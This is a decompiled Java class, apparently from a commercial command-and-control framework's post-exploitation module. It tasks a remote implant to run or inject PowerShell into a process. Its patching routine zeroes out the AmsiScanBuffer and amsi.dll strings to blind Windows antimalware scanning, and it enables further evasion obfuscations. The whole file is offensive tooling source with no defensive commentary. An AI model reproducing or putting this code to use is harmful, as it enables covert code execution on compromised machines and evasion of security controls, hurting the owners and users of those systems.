/*
 * Decompiled with CFR 0.152.
 */
package beacon.jobs;

import beacon.Job;
import beacon.JobHelper;
import beacon.TaskBeacon;
import beacon.jobs.PostExJobs;
import common.BeaconEntry;
import common.CommonUtils;
import common.Packer;
import pe.PostExObfuscator;

public class PowerShellJob
extends Job {
    protected String task;
    protected String cradle;
    protected String desc = "";
    protected BeaconEntry beaconEntry;
    protected String[] patches = null;

    public PowerShellJob(TaskBeacon taskBeacon, String string, String string2, BeaconEntry beaconEntry) {
        super(taskBeacon);
        this.cradle = string;
        this.task = string2;
        this.beaconEntry = beaconEntry;
    }

    public PowerShellJob(TaskBeacon taskBeacon, String string, String string2, BeaconEntry beaconEntry, String[] stringArray) {
        this(taskBeacon, string, string2, beaconEntry);
        this.patches = stringArray;
    }

    @Override
    public String getDescription() {
        if (this.isInject()) {
            return "Tasked beacon to psinject: " + this.task + " into " + this.pid + " (" + this.arch + ")";
        }
        return "Tasked beacon to run: " + this.task + " (unmanaged)";
    }

    @Override
    public String getShortDescription() {
        return "PowerShell (Unmanaged)";
    }

    @Override
    public String getDLLName() {
        if ("x64".equals(this.arch)) {
            return "resources/powershell.x64.dll";
        }
        return "resources/powershell.dll";
    }

    @Override
    public String getPipeName() {
        return "PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    }

    @Override
    public String getTactic() {
        return "T1086";
    }

    @Override
    public int getCallbackType() {
        return this.callBackFunction == null ? 32 : 40;
    }

    @Override
    public int getWaitTime() {
        return 10000;
    }

    @Override
    public String getJobName() {
        return PostExJobs.POWERSHELL.getJobName();
    }

    @Override
    public boolean ignoreToken() {
        return false;
    }

    @Override
    public byte[] fix(byte[] byArray) {
        Packer packer = new Packer();
        packer.addStringUTF8(this.cradle + this.task, 8192);
        byArray = CommonUtils.patch(byArray, "POWERSHELL ABCDEFGHIJKLMNOPQRSTUVWXYZ", CommonUtils.bString(packer.getBytes()));
        if (!this.tasker.disableAMSI()) {
            byArray = CommonUtils.zeroOut(byArray, new String[]{"AmsiScanBuffer", "amsi.dll"});
        }
        byArray = JobHelper.setupPatches(byArray, this.patches, this.arch, this.tasker, this.beaconEntry);
        return byArray;
    }

    @Override
    public void additionalObfuscations(PostExObfuscator postExObfuscator, byte[] byArray) {
        postExObfuscator.enableEvasions();
    }
}

